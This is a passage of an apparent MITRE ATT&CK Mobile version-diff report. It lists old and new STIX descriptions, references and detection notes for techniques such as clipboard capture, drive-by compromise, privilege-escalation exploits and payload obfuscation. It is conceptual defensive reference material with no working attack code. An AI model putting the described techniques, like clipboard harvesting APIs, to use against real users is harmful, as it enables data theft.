>on the foreground or is set as the device’s default input me>IME).(Citation: Github Capture Clipboard 2019)(Citation: And
>thod editor (IME).(Citation: Android 10 Privacy Changes)>roid 10 Privacy Changes)      On iOS, this can be accomplish
 >ed by accessing the `UIPasteboard.general.string` field. How
 >ever, starting in iOS 14, upon accessing the clipboard, the 
 >user will be shown a system notification if the accessed tex
 >t originated in a different application. For example, if the
 > user copies the text of an iMessage from the Messages appli
 >cation, the notification will read “application_name has pas
 >ted from Messages” when the text was pasted in a different a
 >pplication.(Citation: UIPPasteboard)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAndroid Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1017
external_referencesAPP-35
values_changed
STIX FieldOld valueNew Value
modified2019-09-13 20:46:26.223000+00:002022-04-19 19:29:45.323000+00:00
nameCapture Clipboard DataClipboard Data
descriptionAdversaries may abuse Clipboard Manager APIs to obtain sensitive information copied to the global clipboard. For example, passwords being copy-and-pasted from a password manager app could be captured by another application installed on the device.(Citation: Fahl-Clipboard) On Android, ClipboardManager.OnPrimaryClipChangedListener can be used by applications to register as a listener and monitor the clipboard for changes.(Citation: Github Capture Clipboard 2019) Android 10 mitigates this technique by preventing applications from accessing clipboard data unless the application is on the foreground or is set as the device’s default input method editor (IME).(Citation: Android 10 Privacy Changes)Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the device clipboard. For example, passwords being copied and pasted from a password manager application could be captured by a malicious application installed on the device.(Citation: Fahl-Clipboard) On Android, applications can use the `ClipboardManager.OnPrimaryClipChangedListener()` API to register as a listener and monitor the clipboard for changes. However, starting in Android 10, this can only be used if the application is in the foreground, or is set as the device’s default input method editor (IME).(Citation: Github Capture Clipboard 2019)(Citation: Android 10 Privacy Changes) On iOS, this can be accomplished by accessing the `UIPasteboard.general.string` field. However, starting in iOS 14, upon accessing the clipboard, the user will be shown a system notification if the accessed text originated in a different application. For example, if the user copies the text of an iMessage from the Messages application, the notification will read “application_name has pasted from Messages” when the text was pasted in a different application.(Citation: UIPPasteboard)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueAndroid 10 Privacy Changes
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-35.htmlhttps://developer.android.com/about/versions/10/privacy/changes#clipboard-data
external_references[2]['source_name']Fahl-ClipboardUIPPasteboard
external_references[2]['description']Fahl, S, et al.. (2013). Hey, You, Get Off of My Clipboard. Retrieved August 27, 2019.Apple Developer. (n.d.). UIPasteboard. Retrieved April 1, 2022.
external_references[2]['url']http://saschafahl.de/static/paper/pwmanagers2013.pdfhttps://developer.apple.com/documentation/uikit/uipasteboard
external_references[3]['source_name']Github Capture Clipboard 2019Fahl-Clipboard
external_references[3]['description']Pearce, G. (, January). Retrieved August 8, 2019.Fahl, S, et al.. (2013). Hey, You, Get Off of My Clipboard. Retrieved August 27, 2019.
external_references[3]['url']https://github.com/grepx/android-clipboard-securityhttp://saschafahl.de/static/paper/pwmanagers2013.pdf
external_references[4]['source_name']Android 10 Privacy ChangesGithub Capture Clipboard 2019
external_references[4]['description']Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019.Pearce, G. (, January). Retrieved August 8, 2019.
external_references[4]['url']https://developer.android.com/about/versions/10/privacy/changes#clipboard-datahttps://github.com/grepx/android-clipboard-security
x_mitre_detectionCapturing clipboard content can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.Application vetting services could detect usage of standard clipboard APIs.
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-35.html', 'external_id': 'APP-35'}

[T1456] Drive-By Compromise

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1As described by [Drive-by Compromise](https://attack.mitre.ot1Adversaries may gain access to a system through a user visit
>rg/techniques/T1189), a drive-by compromise is when an adver>ing a website over the normal course of browsing. With this 
>sary gains access to a system through a user visiting a webs>technique, the user's web browser is typically targeted for 
>ite over the normal course of browsing. With this technique,>exploitation, but adversaries may also use compromised websi
> the user's web browser is targeted for exploitation. For ex>tes for non-exploitation behavior such as acquiring an [Appl
>ample, a website may contain malicious media content intende>ication Access Token](https://attack.mitre.org/techniques/T1
>d to exploit vulnerabilities in media parsers as demonstrate>550/001).  Multiple ways of delivering exploit code to a bro
>d by the Android Stagefright vulnerability  (Citation: Zimpe>wser exist, including:  * A legitimate website is compromise
>rium-Stagefright).  (This technique was formerly known as Ma>d where adversaries have injected some form of malicious cod
>licious Web Content. It has been renamed to better align wit>e such as JavaScript, iFrames, and cross-site scripting. * M
>h ATT&CK for Enterprise.)>alicious ads are paid for and served through legitimate ad p
 >roviders. * Built-in web application interfaces are leverage
 >d for the insertion of any other kind of object that can be 
 >used to display web content or contain a script that execute
 >s on the visiting client (e.g. forum posts, comments, and ot
 >her user controllable web content).  Often the website used 
 >by an adversary is one visited by a specific community, such
 > as government, a particular industry, or region, where the 
 >goal is to compromise a specific user or set of users based 
 >on a shared interest. This kind of targeted attack is referr
 >ed to a strategic web compromise or watering hole attack. Th
 >ere are several known examples of this occurring.(Citation: 
 >Lookout-StealthMango)  Typical drive-by compromise process: 
 > 1. A user visits a website that is used to host the adversa
 >ry controlled content. 2. Scripts automatically execute, typ
 >ically searching versions of the browser and plugins for a p
 >otentially vulnerable version.      * The user may be requir
 >ed to assist in this process by enabling scripting or active
 > website components and ignoring warning dialog boxes. 3. Up
 >on finding a vulnerable version, exploit code is delivered t
 >o the browser. 4. If exploitation is successful, then it wil
 >l give the adversary code execution on the user's system unl
 >ess other protections are in place.     * In some cases a se
 >cond visit to the website after the initial scan is required
 > before exploit code is delivered.

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionMobile security products can often alert the user if their device is vulnerable to known exploits.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesLookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.
external_referencesCEL-22
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1059
external_referencesCEL-22
external_referencesZimperium. (2015, January 27). Experts Found a Unicorn in the Heart of Android. Retrieved December 23, 2016.
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-19 15:32:30.837000+00:00
nameDrive-by CompromiseDrive-By Compromise
descriptionAs described by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), a drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. For example, a website may contain malicious media content intended to exploit vulnerabilities in media parsers as demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright). (This technique was formerly known as Malicious Web Content. It has been renamed to better align with ATT&CK for Enterprise.)Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring an [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Lookout-StealthMango) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueLookout-StealthMango
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.htmlhttps://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf
external_references[2]['source_name']Zimperium-StagefrightNIST Mobile Threat Catalogue
external_references[2]['url']https://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html
x_mitre_version1.02.0

[T1521] Encrypted Channel

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-10-01 14:18:47.762000+00:002022-04-05 20:11:35.852000+00:00
nameStandard Cryptographic ProtocolEncrypted Channel
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_detectionSince data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is undetectable to the user.Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.
x_mitre_version1.02.0

[T1404] Exploitation for Privilege Escalation

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1A malicious app can exploit unpatched vulnerabilities in thet1Adversaries may exploit software vulnerabilities in order to
> operating system to obtain escalated privileges.> to elevate privileges. Exploitation of a software vulnerabi
 >lity occurs when an adversary takes advantage of a programmi
 >ng error in an application, service, within the operating sy
 >stem software, or kernel itself to execute adversary-control
 >led code. Security constructions, such as permission levels,
 > will often hinder access to information and use of certain 
 >techniques. Adversaries will likely need to perform privileg
 >e escalation to include use of software exploitation to circ
 >umvent those restrictions.   When initially gaining access t
 >o a device, an adversary may be operating within a lower pri
 >vileged process which will prevent them from accessing certa
 >in resources on the system. Vulnerabilities may exist, usual
 >ly in operating system components and applications running a
 >t higher permissions, that can be exploited to gain higher l
 >evels of access on the system. This could enable someone to 
 >move from unprivileged or user- level permission to root per
 >missions depending on the component that is vulnerable. 

New Mitigations:

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionMobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken. Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1007
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-03-30 15:51:08.258000+00:00
nameExploit OS VulnerabilityExploitation for Privilege Escalation
descriptionA malicious app can exploit unpatched vulnerabilities in the operating system to obtain escalated privileges.Adversaries may exploit software vulnerabilities in order to to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in an application, service, within the operating system software, or kernel itself to execute adversary-controlled code. Security constructions, such as permission levels, will often hinder access to information and use of certain techniques. Adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. When initially gaining access to a device, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and applications running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user- level permission to root permissions depending on the component that is vulnerable.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.02.0

[T1541] Foreground Persistence

Current version: 2.0

Version changed from: 1.0 → 2.0

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesGoogle. (n.d.). Sensors Overview. Retrieved November 19, 2019.
external_referencesAPP-19
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesAPP-19
external_referencesSong Wang. (2019, October 18). Fake Photo Beautification Apps on Google Play can Read SMS Verification Code to Trigger Wireless Application Protocol (WAP)/Carrier Billing. Retrieved November 19, 2019.
values_changed
STIX FieldOld valueNew Value
modified2019-12-26 16:14:33.302000+00:002022-04-08 15:38:03.160000+00:00
kill_chain_phases[0]['phase_name']collectiondefense-evasion
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueAndroid-SensorsOverview
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.htmlhttps://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practices
external_references[2]['source_name']Android-SensorsOverviewAndroid-ForegroundServices
external_references[2]['description']Google. (n.d.). Sensors Overview. Retrieved November 19, 2019.Google. (n.d.). Services overview. Retrieved November 19, 2019.
external_references[2]['url']https://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practiceshttps://developer.android.com/guide/components/services.html#Foreground
external_references[3]['source_name']Android-ForegroundServicesTrendMicro-Yellow Camera
external_references[3]['description']Google. (n.d.). Services overview. Retrieved November 19, 2019.Song Wang. (2019, October 18). Fake Photo Beautification Apps on Google Play can Read SMS Verification Code to Trigger Wireless Application Protocol (WAP)/Carrier Billing. Retrieved November 19, 2019.
external_references[3]['url']https://developer.android.com/guide/components/services.html#Foregroundhttps://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/
external_references[5]['source_name']TrendMicro-Yellow CameraNIST Mobile Threat Catalogue
external_references[5]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html
x_mitre_detectionUsers can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong.Users can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong. Applications could be vetted for their use of the `startForeground()` API, and could be further scrutinized if usage is found.
x_mitre_version1.02.0

[T1544] Ingress Tool Transfer

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Files may be copied from one system to another to stage advet1Adversaries may transfer tools or other files from an extern
>rsary tools or other files over the course of an operation. >al system onto a compromised device to facilitate follow-on 
>Files may be copied from an external adversary-controlled sy>actions. Files may be copied from an external adversary-cont
>stem through the Command and Control channel to bring tools >rolled system through the command and control channel  or th
>into the victim network or onto the victim’s device.>rough alternate protocols with another tool such as FTP.

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-01-21 15:27:30.182000+00:002022-04-06 14:46:25.107000+00:00
nameRemote File CopyIngress Tool Transfer
descriptionFiles may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or onto the victim’s device.Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. Files may be copied from an external adversary-controlled system through the command and control channel or through alternate protocols with another tool such as FTP.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_detectionDownloading remote files is common application behavior and is therefore typically undetectable to the end user.Application vetting services could look for connections to unknown domains or IP addresses. Application vetting services may indicate precisely what content was requested during application execution.
x_mitre_version1.02.0

[T1575] Native API

Current version: 2.0

Version changed from: 1.0 → 2.0

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-04-28 18:34:15.373000+00:002022-04-08 15:46:24.495000+00:00
nameNative CodeNative API
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.02.0

[T1509] Non-Standard Port

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may use non-standard ports to exfiltrate informat1Adversaries may generate network traffic using a protocol an
>tion.>d port paring that are typically not associated. For example
 >, HTTPS over port 8088 or port 587 as opposed to the traditi
 >onal port 443. Adversaries may make changes to the standard 
 >port used by a protocol to bypass filtering or muddle analys
 >is/parsing of network data.

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-09-11 13:27:50.344000+00:002022-04-06 14:50:16.409000+00:00
nameUncommonly Used PortNon-Standard Port
descriptionAdversaries may use non-standard ports to exfiltrate information.Adversaries may generate network traffic using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_detectionDetection would most likely be at the enterprise level, through packet and/or netflow inspection. Many properly configured firewalls may also naturally block command and control traffic over non-standard ports.Application vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection. Many properly configured firewalls may also naturally block command and control traffic over non-standard ports.
x_mitre_version1.02.0

[T1406] Obfuscated Files or Information

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1An app could contain malicious code in obfuscated or encryptt1Adversaries may attempt to make a payload or file difficult 
>ed form, then deobfuscate or decrypt the code at runtime to >to discover or analyze by encrypting, encoding, or otherwise
>evade many app vetting techniques.(Citation: Rastogi) (Citat> obfuscating its contents on the device or in transit. This 
>ion: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS)>is common behavior that can be used across different platfor
 >ms and the network to evade defenses.    Payloads may be com
 >pressed, archived, or encrypted in order to avoid detection.
 > These payloads may be used during Initial Access or later t
 >o mitigate detection. Portions of files can also be encoded 
 >to hide the plaintext strings that would otherwise help defe
 >nders with discovery. Payloads may also be split into separa
 >te, seemingly benign files that only reveal malicious functi
 >onality when reassembled.(Citation: Microsoft MalLockerB) 

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesD. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.
external_referencesAPP-21
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1009
external_referencesAPP-21
external_referencesVaibhav Rastogi, Yan Chen, and Xuxian Jiang. (2013, May). DroidChameleon: Evaluating Android Anti-malware against Transformation Attacks. Retrieved December 9, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-09-23 13:26:01.263000+00:002022-04-06 12:36:31.652000+00:00
descriptionAn app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques.(Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS)Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Microsoft MalLockerB)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueMicrosoft MalLockerB
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.htmlhttps://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/
external_references[2]['source_name']RastogiNIST Mobile Threat Catalogue
external_references[2]['url']http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdfhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html
x_mitre_detectionMalicious obfuscation of files or information can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversary behavior.Dynamic analysis, when used in application vetting, may in some cases be able to identify malicious code in obfuscated or encrypted form by detecting the code at execution time (after it is deobfuscated or decrypted). Some application vetting techniques apply reputation analysis of the application developer and can alert to potentially suspicious applications without actual examination of application code.
x_mitre_version2.03.0
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Zhou', 'description': 'Yajin Zhou and Xuxian Jiang. (2012, May). Dissecting Android Malware: Characterization and Evolution. Retrieved December 9, 2016.', 'url': 'http://ieeexplore.ieee.org/document/6234407'}
external_references{'source_name': 'TrendMicro-Obad', 'description': 'Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.', 'url': 'http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/'}
external_references{'source_name': 'Xiao-iOS', 'description': 'Claud Xiao. (2016, July). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved December 9, 2016.', 'url': 'http://www.slideshare.net/Shakacon/fruit-vs-zombies-defeat-nonjailbroken-ios-malware-by-claud-xiao'}

[T1424] Process Discovery

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1On Android versions prior to 5, applications can observe inft1Adversaries may attempt to get information about running pro
>ormation about other processes that are running through meth>cesses on a device. Information obtained could be used to ga
>ods in the ActivityManager class. On Android versions prior >in an understanding of common software/applications running 
>to 7, applications can obtain this information by executing >on devices within a network. Adversaries may use the informa
>the <code>ps</code> command, or by examining the <code>/proc>tion from [Process Discovery](https://attack.mitre.org/techn
></code> directory. Starting in Android version 7, use of the>iques/T1424) during automated discovery to shape follow-on b
> Linux kernel's <code>hidepid</code> feature prevents applic>ehaviors, including whether or not the adversary fully infec
>ations (without escalated privileges) from accessing this in>ts the target and/or attempts specific actions.      Recent 
>formation (Citation: Android-SELinuxChanges).>Android security enhancements have made it more difficult to
 > obtain a list of running processes. On Android 7 and later,
 > there is no way for an application to obtain the process li
 >st without abusing elevated privileges. This is due to the A
 >ndroid kernel utilizing the `hidepid` mount feature. Prior t
 >o Android 7, applications could utilize the `ps` command or 
 >examine the `/proc` directory on the device.(Citation: Andro
 >id-SELinuxChanges)      In iOS, applications have previously
 > been able to use the `sysctl` command to obtain a list of r
 >unning processes. This functionality has been removed in lat
 >er iOS versions. 

New Mitigations:

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionMobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of `ps` or inspection of the `/proc` directory.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1027
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-03-30 20:32:19.942000+00:00
descriptionOn Android versions prior to 5, applications can observe information about other processes that are running through methods in the ActivityManager class. On Android versions prior to 7, applications can obtain this information by executing the ps command, or by examining the /proc directory. Starting in Android version 7, use of the Linux kernel's hidepid feature prevents applications (without escalated privileges) from accessing this information (Citation: Android-SELinuxChanges).Adversaries may attempt to get information about running processes on a device. Information obtained could be used to gain an understanding of common software/applications running on devices within a network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Recent Android security enhancements have made it more difficult to obtain a list of running processes. On Android 7 and later, there is no way for an application to obtain the process list without abusing elevated privileges. This is due to the Android kernel utilizing the `hidepid` mount feature. Prior to Android 7, applications could utilize the `ps` command or examine the `/proc` directory on the device.(Citation: Android-SELinuxChanges) In iOS, applications have previously been able to use the `sysctl` command to obtain a list of running processes. This functionality has been removed in later iOS versions.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsiOS

[T1458] Replication Through Removable Media

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1If the mobile device is connected (typically via USB) to a ct1Adversaries may move onto devices by exploiting or copying m
>harging station or a PC, for example to charge the device's >alware to devices connected via USB. In the case of Lateral 
>battery, then a compromised or malicious charging station or>Movement, adversaries may utilize the physical connection of
> PC could attempt to exploit the mobile device via the conne> a device to a compromised or malicious charging station or 
>ction(Citation: Krebs-JuiceJacking).  Previous demonstration>PC to bypass application store requirements and install mali
>s have included:  * Injecting malicious applications into iO>cious applications directly.(Citation: Lau-Mactans) In the c
>S devices(Citation: Lau-Mactans). * Exploiting a Nexus 6 or >ase of Initial Access, adversaries may attempt to exploit th
>6P device over USB and gaining the ability to perform action>e device via the connection to gain access to data stored on
>s including intercepting phone calls, intercepting network t> the device.(Citation: Krebs-JuiceJacking) Examples of this 
>raffic, and obtaining the device physical location(Citation:>include:    * Exploiting insecure bootloaders in a Nexus 6 o
> IBM-NexusUSB). * Exploiting Android devices such as the Goo>r 6P device over USB and gaining the ability to perform acti
>gle Pixel 2 over USB(Citation: GoogleProjectZero-OATmeal).  >ons including intercepting phone calls, intercepting network
>Products from Cellebrite and Grayshift purportedly can use p> traffic, and obtaining the device physical location.(Citati
>hysical access to the data port to unlock the passcode on so>on: IBM-NexusUSB)  * Exploiting weakly-enforced security bou
>me iOS devices(Citation: Computerworld-iPhoneCracking).>ndaries in Android devices such as the Google Pixel 2 over U
 >SB.(Citation: GoogleProjectZero-OATmeal)  * Products from Ce
 >llebrite and Grayshift purportedly that can exploit some iOS
 > devices using physical access to the data port to unlock th
 >e passcode.(Citation: Computerworld-iPhoneCracking) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesBrian Krebs. (2011, August 17). Beware of Juice-Jacking. Retrieved December 23, 2016.
external_referencesPHY-1
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1061
external_referencesPHY-1
external_referencesLucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology – and police are buying. Retrieved September 21, 2018.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 15:10:41.460000+00:002022-04-08 15:53:11.864000+00:00
nameExploit via Charging Station or PCReplication Through Removable Media
descriptionIf the mobile device is connected (typically via USB) to a charging station or a PC, for example to charge the device's battery, then a compromised or malicious charging station or PC could attempt to exploit the mobile device via the connection(Citation: Krebs-JuiceJacking). Previous demonstrations have included: * Injecting malicious applications into iOS devices(Citation: Lau-Mactans). * Exploiting a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location(Citation: IBM-NexusUSB). * Exploiting Android devices such as the Google Pixel 2 over USB(Citation: GoogleProjectZero-OATmeal). Products from Cellebrite and Grayshift purportedly can use physical access to the data port to unlock the passcode on some iOS devices(Citation: Computerworld-iPhoneCracking).Adversaries may move onto devices by exploiting or copying malware to devices connected via USB. In the case of Lateral Movement, adversaries may utilize the physical connection of a device to a compromised or malicious charging station or PC to bypass application store requirements and install malicious applications directly.(Citation: Lau-Mactans) In the case of Initial Access, adversaries may attempt to exploit the device via the connection to gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this include: * Exploiting insecure bootloaders in a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location.(Citation: IBM-NexusUSB) * Exploiting weakly-enforced security boundaries in Android devices such as the Google Pixel 2 over USB.(Citation: GoogleProjectZero-OATmeal) * Products from Cellebrite and Grayshift purportedly that can exploit some iOS devices using physical access to the data port to unlock the passcode.(Citation: 